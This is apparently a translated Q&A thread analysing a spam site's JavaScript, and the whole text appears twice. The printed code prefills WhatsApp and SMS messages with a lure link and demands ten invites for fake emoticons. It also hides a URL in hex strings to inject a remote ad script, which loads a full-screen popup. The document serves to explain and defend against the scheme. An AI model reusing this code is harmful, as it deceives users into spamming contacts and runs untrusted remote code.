恶意网站:破译代码?
Malicious website: deciphering the code?
这是一个恶意网站,它试图向人们发送垃圾邮件以进一步传播他们的网站,这也会导致出现广告 - 我建议启用 noscript。
http://trucchiios.com/emoticon/index_en.php
现在我这里有当你按下 whatsapp 大按钮时执行的代码,但它有什么作用?
// Click counter shared by fn1, fn2 and fn3. It is assigned without var/let/const, so it becomes an
// implicit global on window and any other script on the page can read or reset it.
c = 0;
// Declared but never referenced anywhere in the code shown in this sample.
var image;
/**
 * Handler behind the page's big "WhatsApp" button (per the question text). The parameter x is never
 * used. Every call on a mobile user agent increments the global counter c and, depending on c:
 *   - c 1..6:  opens a whatsapp://send URI with a prefilled lure message linking to http://xy7.co/emoticon
 *   - c 7..10: opens the same URI and additionally injects a third-party script into <head>
 *   - c > 10:  opens an ad frame on ads.sprintrade.com
 * Desktop user agents only see an alert asking them to use a mobile browser.
 * Analyst note: nothing in this function delivers the promised emoticons; the visible effects are
 * sharing the lure, analytics events and ad loading.
 */
function fn1(x)
{
if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
// Mobile branch: selected purely by user-agent substring match, so a spoofed UA also lands here.
++c;
if (c <= 6)
{
// "_self" navigates the current tab to the whatsapp:// URI, handing the prefilled text to the app.
// %0D%0A is a percent-encoded CRLF; the trailing date/time string is fixed text inside the lure.
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
// Google Analytics events record how many times this visitor pressed the share button.
if (c == 2) {
ga('send', 'event', 'WhatsApp', '1+ share', 'Emoticon EN');
} else if (c == 4) {
ga('send', 'event', 'WhatsApp', '3+ shares', 'Emoticon EN');
}
} else if (c <= 10) {
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
if (c == 7) {
ga('send', 'event', 'WhatsApp', 'more than 7 shares', 'Emoticon EN');
}
var head = document.getElementsByTagName('head').item(0);
// Hex-escaped string table. Decoded, the entries are: "script", "createElement", "type",
// "text/javascript", "src", "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]",
// "appendChild". Indexing DOM members through such a table is a light obfuscation that hides the
// injected URL from a plain-text search of the page source.
var _0xc631 = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x73\x2E\x73\x70\x72\x69\x6E\x74\x72\x61\x64\x65\x2E\x63\x6F\x6D\x2F\x61\x64\x73\x63\x72\x69\x70\x74\x2E\x70\x68\x70\x3F\x70\x69\x64\x3D\x38\x36\x37\x33\x26\x6F\x72\x64\x3D\x5B\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x5D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
// Equivalent to: document.createElement("script"); type = "text/javascript"; src = <URL above>;
// head.appendChild(script). The script is fetched over plain HTTP from a third-party host and runs
// with this page's privileges, so whatever that host returns decides what happens next.
// The literal "[timestamp]" placeholder is sent as-is; nothing visible here substitutes a value.
var script = document[_0xc631[1]](_0xc631[0]);
script[_0xc631[2]] = _0xc631[3];
script[_0xc631[4]] = _0xc631[5];
head[_0xc631[6]](script);
} else
// More than ten presses: no target is given, so the ad frame opens in a new window or tab.
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else {
window.alert("Please invite via your mobile browser");
}
}
/**
 * SMS variant of the share handler; the parameter x is never used. On a mobile user agent it
 * increments the shared counter c and, for the first ten presses, opens an sms: URI whose body is
 * the same lure text and http://xy7.co/emoticon link used by fn1. After that it opens the ad frame.
 * Unlike fn1 it sends no analytics events and injects no script.
 */
function fn3(x) {
if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
// Mobile branch, chosen by user-agent substring match only.
++c;
if (c <= 10) {
// "_self" navigates the current tab to the sms: URI, handing the prefilled body to the SMS app.
window.open("sms:?body=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
} else
// No target given: the ad frame opens in a new window or tab.
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else {
window.alert("Please invite via your mobile browser");
}
}
/**
 * "Activate" handler; the parameter x is never used. It gates on the shared counter c: below ten
 * presses it shows an alert telling the visitor to invite more contacts, and from ten onwards it
 * opens the ads.sprintrade.com ad frame.
 * Analyst note: c counts button presses, not messages actually sent, and the "reward" branch in the
 * visible code is only the ad frame.
 */
function fn2(x) {
if (c >= 10)
{
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else
{
// Social-engineering prompt: pushes the visitor to keep sharing the lure until c reaches 10.
window.alert("To activate the new emoticons you have to invite at least 10 contacts. 10 friends or 3 groups. So far you've only invited " + c + " contacts.");
}
}
// Countdown that runs from page load, independent of any button press. Every 1000 ms it writes n
// into the #countdown element and decrements it; on the tick where n reaches -1 (after showing 0)
// it navigates the current tab ("_self") to the ad frame and stops the timer.
// `$` is presumably jQuery loaded elsewhere on the page - not visible in this sample.
var n = 300,
t = setInterval(function() {
// The comma, && and single & are only used to chain the calls in one expression; `&` is a bitwise
// AND, so both window.open(...) and clearInterval(t) are evaluated.
$("#countdown").text(n--), -1 == n && window.open("http://ads.sprintrade.com/adframe.php?pid=12649", "_self") & clearInterval(t)
}, 1e3);
我只想有人告诉我它的作用。我怀疑这只是垃圾广告,并非真正的恶意软件,但请检查一下。
它添加 javascript 文件:http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]
。
完整代码:
// Same injection as in fn1 with the hex escapes decoded to readable strings. `head` is not defined
// in this excerpt; in fn1 it is the page's <head> element.
var _0xc631 = ["script", "createElement", "type", "text/javascript", "src", "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]", "appendChild"]
// document["createElement"]("script")
var script = document[_0xc631[1]](_0xc631[0]);
// script["type"] = "text/javascript"
script[_0xc631[2]] = _0xc631[3];
// script["src"] = the adscript.php URL (plain HTTP, third-party host)
script[_0xc631[4]] = _0xc631[5];
// head["appendChild"](script) - this is the point where the remote script is fetched and executed.
head[_0xc631[6]](script);
"Normal"代码:
// Fully de-obfuscated form of the injection: a plain dynamic <script> include. `head` comes from
// fn1 and is not defined in this excerpt.
var script = document.createElement("script");
script.type = "text/javascript";
// Loaded over plain HTTP from a third-party ad host; the response runs with the page's privileges.
script.src = "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]";
head.appendChild(script);
页面 .../adscript.php?pid=8673&ord=[timestamp] 借助缓存头,完整内容只会显示一次。首次访问时,您会得到:
// First response of adscript.php?pid=8673 as captured in the answer. It keeps state on the
// `document` object: asm_excl is a list of exclusion ids and asm_max_2398 counts how many times
// this script has run in the current document. String("").split("|") yields [""], so one empty
// entry is appended here; presumably the server fills that string with ids in other responses.
if(typeof(document.asm_excl) == "undefined"){ document.asm_excl = new Array(); } document.asm_excl = document.asm_excl.concat(String("").split("|")); if(typeof(document.asm_max_2398) == "undefined"){ document.asm_max_2398 = 1; }
else{ document.asm_max_2398++; }
var asm_ex = false;
var asm_ex_all = false;
// asm_ex: the id "2398" (the same value as the `kid` option below) is on the exclusion list.
for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "2398"){asm_ex = true; break;}}
// asm_ex_all: "w21272" or "p8673" is on the list; the numbers match wsid and pid in the URLs below.
for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "w21272" || document.asm_excl[asm_i] == "p8673"){asm_ex_all = true; break;}}
// Excluded entirely: do nothing.
if(asm_ex_all){}
// Not excluded and first run in this document: load the popup library and open the popup.
else if(!asm_ex && document.asm_max_2398 <= 1)
{
document.write('');
(function ()
{
// r is set to true in the callback but never read in the visible code; t is never used.
var s, r, t;
r = false;
s = document.createElement("script");
s.type = "text/javascript";
// Second-stage script from another third-party host, again over plain HTTP.
s.src = "http://cdn.adspirit.de/banner/asmpop_async.js";
// readySet makes sure the callback runs once even if both onload and onreadystatechange fire.
s.readySet = false;
s.onload = function (){if(!this.readySet){this.readySet=true;asm_pop_asmfls8673x5396511y1447611443();}};
s.onreadystatechange = function (){if ( !this.readySet && (!this.readyState || this.readyState == "complete")){this.readySet=true; asm_pop_asmfls8673x5396511y1447611443();}};
// Callback run once asmpop_async.js has loaded: builds the popup configuration and constructs
// asm_popup, which is not defined in this sample (presumably provided by asmpop_async.js).
function asm_pop_asmfls8673x5396511y1447611443()
{
r = true;
var asm_pop_options = new Object()
// Popup target; the query string carries campaign/tracking ids (pid, kid, wmid, wsid, uid, wpcn).
asm_pop_options.url = "http://ads.sprintrade.com/adpop.php?tz=1447611443715312&pid=8673&kid=2398&wmid=28565&wsid=21272&uid=9&ord=%5Btimestamp%5D&wpcn=asmpvx8547661447611443";
// breite/hoehe/links/oben are German for width/height/left/top: a 1920x1080 window at 0,0.
asm_pop_options.breite = "1920";
asm_pop_options.hoehe = "1080";
asm_pop_options.links = "0";
asm_pop_options.oben = "0";
// Window-feature string: fullscreen and alwaysRaised are requested, location/menu/tool bars are
// turned off. How many of these a given browser honours is not visible from this sample.
asm_pop_options.ops = "alwaysLowered=0,alwaysRaised=1,dependent=0,fullscreen=1,location=0,menubar=0,resizable=0,scrollbars=1,status=0,titlebar=0,toolbar=0,disableFullscreen=0,disableClose=0,disableBorder=0";
asm_pop_options.layeronly = false;
asm_pop_options.popunder = false;
asm_pop_options.canlayer = false;
// NOTE(review): clickpop presumably ties the popup to a user click; its exact meaning is defined
// in asmpop_async.js, which is not shown.
asm_pop_options.clickpop = true;
asm_pop_options.close = "0";
asm_pop_options.booLoad = true;
asm_pop_options.loadTime = "2";
asm_pop_options.closeTime = "0";
// Presumably the cookie domain used for frequency capping - confirm against asmpop_async.js.
asm_pop_options.cookdom = "sprintrade.com";
asm_pop_options.poptitle = "";
asm_pop_options.popdomain = "http://cdn.adspirit.de";
asm_pop_options.kid = "2398";
asm_pop_options.pid = "8673";
asm_pop_options.id = "asmfls8673x5396511y1447611443";
window.asm_pop_asmfls8673x5396511y1447611443 = new asm_popup(asm_pop_options);
}
// Insert the loader right after the last <script> currently in the document, or append it to
// <body> when no script element is found.
var ss = document.getElementsByTagName("script");
if(ss.length>0){ ss[ss.length-1].parentNode.insertBefore(s, ss[ss.length-1].nextSibling); }
else if(document.body){document.body.appendChild(s);}
})()
document.write('');
}
// Already run once, or id 2398 is excluded: request adscript.php again with ex=|2398 and a
// Date-based cache buster so the server can answer differently. The tag name is split into
// '<scr'+'ipt' pieces so the literal never contains a complete script tag.
else
{
document.write('<scr'+'ipt type="text\/javasc'+'ript" language="JavaSc'+'ript" src="http://ads.sprintrade.com/adscript.php?pid=8673&hr=1&nrc=1&&wpcn=asmpvx8547661447611443&ex=|2398&ord='+(new Date()).getTime()+'"><\/scr'+'ipt>');
}
此后再次访问时,得到的是:
// Response body on repeat requests, per the surrounding answer: an empty write, so the popup
// loader is not delivered a second time.
document.write('');
该脚本只会运行一次。
语言是Javascript。
这些与 mailto:
链接(调用电子邮件的默认应用程序)几乎相同,但在这种情况下,它调用默认的 WhatsApp 应用程序或 SMS 应用程序(取决于 OS) 然后发送广告。
(%0D%0A 是 CRLF(回车换行)的 URL 百分号编码形式)
不过话又说回来,如果你说它是一个大 "WhatsApp" 按钮,你希望它做什么?
似乎是这段代码导致了上周收到的垃圾邮件数量不断增加。我很确定此代码正在使用 Whatsapp web 向恶意网站发送 link:
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P [...]", "_self");
如果使用移动设备,
if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {
还尝试发送短信:
"sms:?body=Check out the new WhatsApp animated emoticons :P [...]", "_self");
执行此代码时还会加载其他一些插件站点。这段代码似乎还执行了一些其他任务,但很难确定。该脚本是使用 JavaScript 编写的。
这是一个恶意网站,它试图向人们发送垃圾邮件以进一步传播他们的网站,这也会导致出现广告 - 我建议启用 noscript。
http://trucchiios.com/emoticon/index_en.php
现在我这里有当你按下 whatsapp 大按钮时执行的代码,但它有什么作用?
// Click counter shared by fn1, fn2 and fn3. It is assigned without var/let/const, so it becomes an
// implicit global on window and any other script on the page can read or reset it.
c = 0;
// Declared but never referenced anywhere in the code shown in this sample.
var image;
/**
 * Handler behind the page's big "WhatsApp" button (per the question text). The parameter x is never
 * used. Every call on a mobile user agent increments the global counter c and, depending on c:
 *   - c 1..6:  opens a whatsapp://send URI with a prefilled lure message linking to http://xy7.co/emoticon
 *   - c 7..10: opens the same URI and additionally injects a third-party script into <head>
 *   - c > 10:  opens an ad frame on ads.sprintrade.com
 * Desktop user agents only see an alert asking them to use a mobile browser.
 * Analyst note: nothing in this function delivers the promised emoticons; the visible effects are
 * sharing the lure, analytics events and ad loading.
 */
function fn1(x)
{
if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
// Mobile branch: selected purely by user-agent substring match, so a spoofed UA also lands here.
++c;
if (c <= 6)
{
// "_self" navigates the current tab to the whatsapp:// URI, handing the prefilled text to the app.
// %0D%0A is a percent-encoded CRLF; the trailing date/time string is fixed text inside the lure.
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
// Google Analytics events record how many times this visitor pressed the share button.
if (c == 2) {
ga('send', 'event', 'WhatsApp', '1+ share', 'Emoticon EN');
} else if (c == 4) {
ga('send', 'event', 'WhatsApp', '3+ shares', 'Emoticon EN');
}
} else if (c <= 10) {
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
if (c == 7) {
ga('send', 'event', 'WhatsApp', 'more than 7 shares', 'Emoticon EN');
}
var head = document.getElementsByTagName('head').item(0);
// Hex-escaped string table. Decoded, the entries are: "script", "createElement", "type",
// "text/javascript", "src", "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]",
// "appendChild". Indexing DOM members through such a table is a light obfuscation that hides the
// injected URL from a plain-text search of the page source.
var _0xc631 = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x73\x2E\x73\x70\x72\x69\x6E\x74\x72\x61\x64\x65\x2E\x63\x6F\x6D\x2F\x61\x64\x73\x63\x72\x69\x70\x74\x2E\x70\x68\x70\x3F\x70\x69\x64\x3D\x38\x36\x37\x33\x26\x6F\x72\x64\x3D\x5B\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x5D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
// Equivalent to: document.createElement("script"); type = "text/javascript"; src = <URL above>;
// head.appendChild(script). The script is fetched over plain HTTP from a third-party host and runs
// with this page's privileges, so whatever that host returns decides what happens next.
// The literal "[timestamp]" placeholder is sent as-is; nothing visible here substitutes a value.
var script = document[_0xc631[1]](_0xc631[0]);
script[_0xc631[2]] = _0xc631[3];
script[_0xc631[4]] = _0xc631[5];
head[_0xc631[6]](script);
} else
// More than ten presses: no target is given, so the ad frame opens in a new window or tab.
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else {
window.alert("Please invite via your mobile browser");
}
}
/**
 * SMS variant of the share handler; the parameter x is never used. On a mobile user agent it
 * increments the shared counter c and, for the first ten presses, opens an sms: URI whose body is
 * the same lure text and http://xy7.co/emoticon link used by fn1. After that it opens the ad frame.
 * Unlike fn1 it sends no analytics events and injects no script.
 */
function fn3(x) {
if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
// Mobile branch, chosen by user-agent substring match only.
++c;
if (c <= 10) {
// "_self" navigates the current tab to the sms: URI, handing the prefilled body to the SMS app.
window.open("sms:?body=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
} else
// No target given: the ad frame opens in a new window or tab.
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else {
window.alert("Please invite via your mobile browser");
}
}
/**
 * "Activate" handler; the parameter x is never used. It gates on the shared counter c: below ten
 * presses it shows an alert telling the visitor to invite more contacts, and from ten onwards it
 * opens the ads.sprintrade.com ad frame.
 * Analyst note: c counts button presses, not messages actually sent, and the "reward" branch in the
 * visible code is only the ad frame.
 */
function fn2(x) {
if (c >= 10)
{
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else
{
// Social-engineering prompt: pushes the visitor to keep sharing the lure until c reaches 10.
window.alert("To activate the new emoticons you have to invite at least 10 contacts. 10 friends or 3 groups. So far you've only invited " + c + " contacts.");
}
}
// Countdown that runs from page load, independent of any button press. Every 1000 ms it writes n
// into the #countdown element and decrements it; on the tick where n reaches -1 (after showing 0)
// it navigates the current tab ("_self") to the ad frame and stops the timer.
// `$` is presumably jQuery loaded elsewhere on the page - not visible in this sample.
var n = 300,
t = setInterval(function() {
// The comma, && and single & are only used to chain the calls in one expression; `&` is a bitwise
// AND, so both window.open(...) and clearInterval(t) are evaluated.
$("#countdown").text(n--), -1 == n && window.open("http://ads.sprintrade.com/adframe.php?pid=12649", "_self") & clearInterval(t)
}, 1e3);
我只想有人告诉我它的作用。我怀疑这只是垃圾广告,并非真正的恶意软件,但请检查一下。
它添加 javascript 文件:http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]
。
完整代码:
// Same injection as in fn1 with the hex escapes decoded to readable strings. `head` is not defined
// in this excerpt; in fn1 it is the page's <head> element.
var _0xc631 = ["script", "createElement", "type", "text/javascript", "src", "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]", "appendChild"]
// document["createElement"]("script")
var script = document[_0xc631[1]](_0xc631[0]);
// script["type"] = "text/javascript"
script[_0xc631[2]] = _0xc631[3];
// script["src"] = the adscript.php URL (plain HTTP, third-party host)
script[_0xc631[4]] = _0xc631[5];
// head["appendChild"](script) - this is the point where the remote script is fetched and executed.
head[_0xc631[6]](script);
"Normal"代码:
// Fully de-obfuscated form of the injection: a plain dynamic <script> include. `head` comes from
// fn1 and is not defined in this excerpt.
var script = document.createElement("script");
script.type = "text/javascript";
// Loaded over plain HTTP from a third-party ad host; the response runs with the page's privileges.
script.src = "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]";
head.appendChild(script);
页面 .../adscript.php?pid=8673&ord=[timestamp] 借助缓存头,完整内容只会显示一次。首次访问时,您会得到:
// First response of adscript.php?pid=8673 as captured in the answer. It keeps state on the
// `document` object: asm_excl is a list of exclusion ids and asm_max_2398 counts how many times
// this script has run in the current document. String("").split("|") yields [""], so one empty
// entry is appended here; presumably the server fills that string with ids in other responses.
if(typeof(document.asm_excl) == "undefined"){ document.asm_excl = new Array(); } document.asm_excl = document.asm_excl.concat(String("").split("|")); if(typeof(document.asm_max_2398) == "undefined"){ document.asm_max_2398 = 1; }
else{ document.asm_max_2398++; }
var asm_ex = false;
var asm_ex_all = false;
// asm_ex: the id "2398" (the same value as the `kid` option below) is on the exclusion list.
for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "2398"){asm_ex = true; break;}}
// asm_ex_all: "w21272" or "p8673" is on the list; the numbers match wsid and pid in the URLs below.
for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "w21272" || document.asm_excl[asm_i] == "p8673"){asm_ex_all = true; break;}}
// Excluded entirely: do nothing.
if(asm_ex_all){}
// Not excluded and first run in this document: load the popup library and open the popup.
else if(!asm_ex && document.asm_max_2398 <= 1)
{
document.write('');
(function ()
{
// r is set to true in the callback but never read in the visible code; t is never used.
var s, r, t;
r = false;
s = document.createElement("script");
s.type = "text/javascript";
// Second-stage script from another third-party host, again over plain HTTP.
s.src = "http://cdn.adspirit.de/banner/asmpop_async.js";
// readySet makes sure the callback runs once even if both onload and onreadystatechange fire.
s.readySet = false;
s.onload = function (){if(!this.readySet){this.readySet=true;asm_pop_asmfls8673x5396511y1447611443();}};
s.onreadystatechange = function (){if ( !this.readySet && (!this.readyState || this.readyState == "complete")){this.readySet=true; asm_pop_asmfls8673x5396511y1447611443();}};
// Callback run once asmpop_async.js has loaded: builds the popup configuration and constructs
// asm_popup, which is not defined in this sample (presumably provided by asmpop_async.js).
function asm_pop_asmfls8673x5396511y1447611443()
{
r = true;
var asm_pop_options = new Object()
// Popup target; the query string carries campaign/tracking ids (pid, kid, wmid, wsid, uid, wpcn).
asm_pop_options.url = "http://ads.sprintrade.com/adpop.php?tz=1447611443715312&pid=8673&kid=2398&wmid=28565&wsid=21272&uid=9&ord=%5Btimestamp%5D&wpcn=asmpvx8547661447611443";
// breite/hoehe/links/oben are German for width/height/left/top: a 1920x1080 window at 0,0.
asm_pop_options.breite = "1920";
asm_pop_options.hoehe = "1080";
asm_pop_options.links = "0";
asm_pop_options.oben = "0";
// Window-feature string: fullscreen and alwaysRaised are requested, location/menu/tool bars are
// turned off. How many of these a given browser honours is not visible from this sample.
asm_pop_options.ops = "alwaysLowered=0,alwaysRaised=1,dependent=0,fullscreen=1,location=0,menubar=0,resizable=0,scrollbars=1,status=0,titlebar=0,toolbar=0,disableFullscreen=0,disableClose=0,disableBorder=0";
asm_pop_options.layeronly = false;
asm_pop_options.popunder = false;
asm_pop_options.canlayer = false;
// NOTE(review): clickpop presumably ties the popup to a user click; its exact meaning is defined
// in asmpop_async.js, which is not shown.
asm_pop_options.clickpop = true;
asm_pop_options.close = "0";
asm_pop_options.booLoad = true;
asm_pop_options.loadTime = "2";
asm_pop_options.closeTime = "0";
// Presumably the cookie domain used for frequency capping - confirm against asmpop_async.js.
asm_pop_options.cookdom = "sprintrade.com";
asm_pop_options.poptitle = "";
asm_pop_options.popdomain = "http://cdn.adspirit.de";
asm_pop_options.kid = "2398";
asm_pop_options.pid = "8673";
asm_pop_options.id = "asmfls8673x5396511y1447611443";
window.asm_pop_asmfls8673x5396511y1447611443 = new asm_popup(asm_pop_options);
}
// Insert the loader right after the last <script> currently in the document, or append it to
// <body> when no script element is found.
var ss = document.getElementsByTagName("script");
if(ss.length>0){ ss[ss.length-1].parentNode.insertBefore(s, ss[ss.length-1].nextSibling); }
else if(document.body){document.body.appendChild(s);}
})()
document.write('');
}
// Already run once, or id 2398 is excluded: request adscript.php again with ex=|2398 and a
// Date-based cache buster so the server can answer differently. The tag name is split into
// '<scr'+'ipt' pieces so the literal never contains a complete script tag.
else
{
document.write('<scr'+'ipt type="text\/javasc'+'ript" language="JavaSc'+'ript" src="http://ads.sprintrade.com/adscript.php?pid=8673&hr=1&nrc=1&&wpcn=asmpvx8547661447611443&ex=|2398&ord='+(new Date()).getTime()+'"><\/scr'+'ipt>');
}
此后再次访问时,得到的是:
// Response body on repeat requests, per the surrounding answer: an empty write, so the popup
// loader is not delivered a second time.
document.write('');
该脚本只会运行一次。
语言是Javascript。
这些与 mailto:
链接(调用电子邮件的默认应用程序)几乎相同,但在这种情况下,它调用默认的 WhatsApp 应用程序或 SMS 应用程序(取决于 OS) 然后发送广告。
(%0D%0A 是 CRLF(回车换行)的 URL 百分号编码形式)
不过话又说回来,如果你说它是一个大 "WhatsApp" 按钮,你希望它做什么?
似乎是这段代码导致了上周收到的垃圾邮件数量不断增加。我很确定此代码正在使用 Whatsapp web 向恶意网站发送 link:
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P [...]", "_self");
如果使用移动设备,
if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {
还尝试发送短信:
"sms:?body=Check out the new WhatsApp animated emoticons :P [...]", "_self");
执行此代码时还会加载其他一些插件站点。这段代码似乎还执行了一些其他任务,但很难确定。该脚本是使用 JavaScript 编写的。